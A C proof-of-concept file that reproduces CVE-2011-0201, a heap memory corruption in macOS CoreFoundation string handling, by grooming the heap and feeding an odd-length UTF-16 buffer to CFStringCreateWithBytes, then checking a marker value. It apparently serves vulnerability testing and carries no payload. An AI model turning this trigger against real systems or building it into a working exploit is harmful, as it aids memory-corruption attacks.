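/* gcc -Wall -O2 CVE-2011-0201.c -framework CoreFoundation -o CVE-2011-0201 */
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#include <CoreFoundation/CoreFoundation.h>

/*
 * Reproducer for CVE-2011-0201 (CoreFoundation string handling).
 *
 * Heap layout: a 1024-byte block (tmp) is allocated, a second 1024-byte block
 * (ptr) is obtained, and only then is tmp freed -- presumably so that ptr sits
 * next to a reusable free chunk of the same size. ptr[0] is set to a marker and
 * printed before and after a single CFStringCreateWithBytes() call that is fed
 * an odd number (1025) of bytes declared as UTF-16. On a vulnerable library the
 * PoC expects the marker to change, i.e. the call wrote outside the memory it
 * owns; on a fixed library both lines should print 0xdeadbeef.
 *
 * Returns 0 after printing both values, 1 if an allocation fails.
 */
int main(void)
{
    /* 1026 zero bytes; only the first 1025 are handed to CoreFoundation. */
    uint8_t buf[1025 + 1] = {0};

    void *tmp = malloc(1024);
    uint32_t *ptr = malloc(1024);
    if (tmp == NULL || ptr == NULL) {
        fputs("malloc failed\n", stderr);
        free(tmp);
        free(ptr);
        return 1;
    }
    /* Freed only after ptr exists: the allocate/allocate/free order is part of the PoC. */
    free(tmp);
    tmp = NULL;

    /* Marker re-read after the call; any other value means ptr's memory was clobbered. */
    ptr[0] = 0xdeadbeef;

    /*
     * buf[1024] = 0xba is the last byte inside the 1025-byte length passed
     * below, so the UTF-16 input ends with a dangling half code unit.
     * buf[1025] = 0xbe lies one byte past that length but still inside buf,
     * so the reproducer itself never reads or writes out of bounds.
     */
    buf[sizeof(buf) - 2] = 0xba;
    buf[sizeof(buf) - 1] = 0xbe;

    printf("ptr[0] pre call: 0x%04" PRIx32 "\n", ptr[0]);
    /*
     * The returned CFStringRef is deliberately not retained or released:
     * the process exits immediately, and touching a possibly corrupted heap
     * after the call could abort before the result line is flushed.
     */
    CFStringCreateWithBytes(NULL, buf, sizeof(buf) - 1, kCFStringEncodingUnicode, true);
    printf("ptr[0] post call: 0x%04" PRIx32 "\n", ptr[0]);

    return 0;
}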